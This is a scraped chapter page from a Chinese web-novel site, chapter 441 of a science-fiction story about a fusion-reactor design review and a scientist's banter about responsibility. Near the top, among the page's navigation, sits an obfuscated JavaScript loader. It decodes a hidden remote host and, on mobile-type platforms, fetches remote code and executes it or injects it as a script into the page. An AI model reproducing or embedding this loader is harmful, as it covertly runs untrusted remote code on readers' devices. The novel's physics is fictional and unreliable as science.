妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

第四百四十一章 核聚变的‘不完善磁约束’,能者多劳?能者担责!(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

“这是其中一点。”

“另外,我们并不需要托卡马克的完全磁约束……”

他讲到了重点。

这一句话说出来,就让很多学者瞪大了眼睛,国际上有关核聚变的研究都围绕托卡马克装置,而托卡马克装置是进行完全的磁约束,也就是螺旋磁场形成一个闭合循环。

现在王浩说不需要‘完全磁约束’,等于说是不需要‘闭环磁场’。

这是全新的技术理论。

王浩认真道,“我的想法是以磁约束的空当,作为装置的主要输出端。如果磁约束有空当,肯定会承受非常大的压力。”

“但是,装置内部是反重力场。”

“大家知道,强反重力场最高能把粒子活跃度降低一倍,反应速度则能降低三倍,甚至四倍以上。”

“这样,我们就能通过调整内部反重力场强度,来对内部聚变反应的速率进行控制。”

“外层,则有吸收能量的强湮灭力场。”

“输出端要承受很大的压力,中子撞击,α粒子的影响都是问题,所以还需要结合高端材料……”

“丁宗权教授的团队,研究出一种升阶高熔点、韧性的铁钨材料,熔点达到了4380摄氏度……”

后续都是有关材料以及其他技术的介绍。

王浩对于反应容器的介绍,主要就是说明磁场、反重力场以及强湮灭力场对于核聚变反应的协调控制。

他还提出了‘不完善磁约束’的想法。

托卡马克装置是利用磁场对于反应进行完全控制,同时,也带来了一系列问题。

比如,温度控制。

比如,原料问题。

托卡马克的完全磁约束限制了反应速率,使得氘氘反应变得‘几乎不可能’,只是点火都是个大难题。

现在已经解决了点火问题,剩下的就是反应效率问题了。

氘氘反应,是核聚变的最佳选择。

原因很简单,自然界几乎不存在天然的氚,人工制造的成本高昂、产量极为有限。

氘则不受限制,海水中就大量存在。

核聚变之所以能够被称为无限能源,是因为海水中的氘对人类来说,几乎是“无限的”。

‘不完善磁约束’的设计,还有一个好处就是解决了α粒子问题。

核聚变反应会产生α粒子。

α粒子是带电粒子,自然会受到磁场影响。

在完全磁约束的环境下,α粒子又是一种需要被去除的杂质,否则会降低聚变反应率。

‘不完善磁约束’环境,磁场就会‘有出口’,α粒子就能够被排出。

……

上午的会议结束了。

每一个参会的学者的积极性都被调动起来,他们不断讨论着会议中的内容,包括完善的点火技术,包括超导材料技术的突破,也包括王浩的‘不完善磁约束’设计想法。

“虽然还有很多需要攻克的难关,但是能实现‘不完善磁约束’,就解决了大部分难题,已经有了主核心方向。”

“‘不完善磁约束’,也会带来新的问题,输出端口的压力会非常大。”

“即便是有反重力场、有强湮灭力场,也很难实现常规的输出……”

“内部高爆发的能量,集中在出口……”

“……”

学者们不断讨论的过程中,话题很快就转到了最关键的材料技术。

很多技术问题都可以用高端材料解决,但是材料技术是最困难的领域之一,想要有一系列突破非常困难。

即便还有很多技术难关,学者们对于论证也多了信心。

现在只是进行第一次论证会,就解决了很多的问题,继续研究再进行论证,一些问题可能就会有解决方案。

这就是论证的目的。

一个大型工程型研究项目,必须要做非常详细的论证,以保证研究不会碰到无法攻克的技术难题。

下午的会议还是继续做报告。

这时候,也有其他的专家学者发言,也有人提出了问题,比如,输出端口的能量转化问题。

核聚变的输出也是个大问题。

从输出的角度上来讲,中子的能量转化为可被利用的热能的效率是有限的,而热力发电本身的效率非常低。

怎么样实现最大化功率输出,是必须要详细论证的内容。

论证会提出了一些问题,解决了一些问题,也出现了新的问题,但不管怎么说,会议达到了预期效果。

等会议结束以后,后续还会一起讨论三天时间。

这一段时间,就供学者们讨论交流了。

王浩则是和徐老师坐在一起,他们继续谈着核聚变的研究项目,但内容不是说技术问题。

徐老师是想找点信心,他苦笑道,“王浩啊,核聚变项目实在太难了,我都没有想到,有生之年还能负责这种项目的论证。”

他说话的时候,还不断抓着头皮。

徐老师的压力确实很大。

核聚变项目实在太重大了,每一个高端决策人都会关注,他是项目论证的直接负责人,也拥有开启项目的决策权。

如果决定正式开启项目,压力就会变得更大。

研究成功,历史自然会记下浓重的一笔;反之,就是他个人工作生涯的重大决策错误。

一切责任都是徐老师担负。

相对来说,王浩并没有什么压力,他说白了就只是个学者,影响力再大也只是个学者,并没有决定开启项目的决策权。

如果可控核聚变技术能研究成功,王浩主导项目研究肯定是最大的功臣。

反之,研究失败,担责的是徐老师。

王浩听着徐老师的抱怨,不由笑了笑,“放心吧。如果论证能够通过,研究就肯定没有问题。”

“这个,我还是有信心的。”

“我也知道您压力大……但是能者多劳,这可是您和我说的……”

徐老师只能带着郁闷的点点头。

他说能者多劳,是希望王浩多做研究,多为国家科学事业做贡献。

换到了自己身上……

能者多劳?

现在是能者担责啊! , )

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间